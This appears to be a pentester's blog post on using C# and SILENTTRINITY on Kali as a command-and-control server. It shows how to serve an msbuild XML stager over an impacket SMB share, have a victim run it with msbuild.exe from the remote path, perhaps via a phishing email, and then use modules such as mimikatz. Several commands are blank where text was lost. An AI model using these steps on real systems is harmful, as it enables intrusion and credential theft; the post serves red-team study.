The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

There’s been a disturbance in pentesting, have you felt it? More mature environments have finally caught on that Powershell can be used for malicious gains and pentesters could own your domain with a few Powershell commands, so admins have began to lock it down, EDRs have began to alert, and thus the saying goes, necessity is the mother of invention. Exit Powershell, enter C#.

So why C#? Simply put, it has access to the .NET framework like Powershell does. The other big reason is that Microsoft has unsigned executables that will compile and execute C# code and those unsigned executables are installed by default with the .NET Framework installation, which means it’s everywhere. Matt Graber found one of the executables and did an excellent write-up of it here. The TL;DR of it is that Microsoft.Workflow.Compiler.exe, which is installed as part of the .NET framework, will run C# code that is in a XOML file. There’s been a huge movement to use LOL (living off the land) tactics, meaning use what you have at your disposal instead of downloading things to victim machines, so this is huge. Of course, people immediately started to look at how to weaponize this as msbuild.exe was also another binary that would do compile and run C# code. byt3bl33d3r, who wrote crackmapexec, Empire, and Deathstar, developed a tool called SILENTTRINITY, which utilizes IronPython to create the C# code in python, then develop the XML file needed by msbuild (If using that payload option). This is how it works:

Using Kali, install Python3

apt-get install python3.7
apt-get install python3.7-dev


git clone

Then install the requirements.

python3.7 -m pip install -r requirements.txt


cd Server

Before starting SILENTTRINITY we’ll spin up a Samba server so that we don’t have to drop files to disk on the target and instead fetch the payload via SMB path. To do this, impacket has a set of tools in their github repository here, one of which is which will spin up a quick SMB server.

First download & install the impacket repository

git clone 

cd impacket

pip install -r requirements.txt

python install

Then create a folder that will be shared

mkdir /root/SMB

Then run Since it was ‘installed’ it can be ran anywhere via -smb2support SMB /root/SMB




You should then be seeing this


Next is to spin up an HTTP listener, as shown below.


Once that is spun up, next is to generate the actual stager, which is what will be executed. In this case, we’re using msbuild.


The XML file is generated in the same directory as, so copy that to the Samba share that was made which in this case is at /root/SMB.

cp msbuild.xml /root/SMB


Finally, the trick now is to get the victim to execute the xml file via SMB path. Of course this is easy if you already have a shell on the machine, otherwise it’s possible to embed this link in a phishing email.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\\SMB\msbuild.xml


You’ll see a command prompt open up and if you look back at SILENTTRINITY, you’ll have a session.


And to list the sessions:


Now you can use modules against that session, like in Empire


e.g. mimikatz


The purpose of this is to show that you never have to drop files to disk and can actually execute code remotely, in memory, by using SMB and binaries that exist on most current Windows deployments. The interesting thing is that this isn’t a bug with msbuild.exe or or workflow.complier.exe, those binaries are meant to do this, we’re just exploiting it for offensive purposes.























One thought on “The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s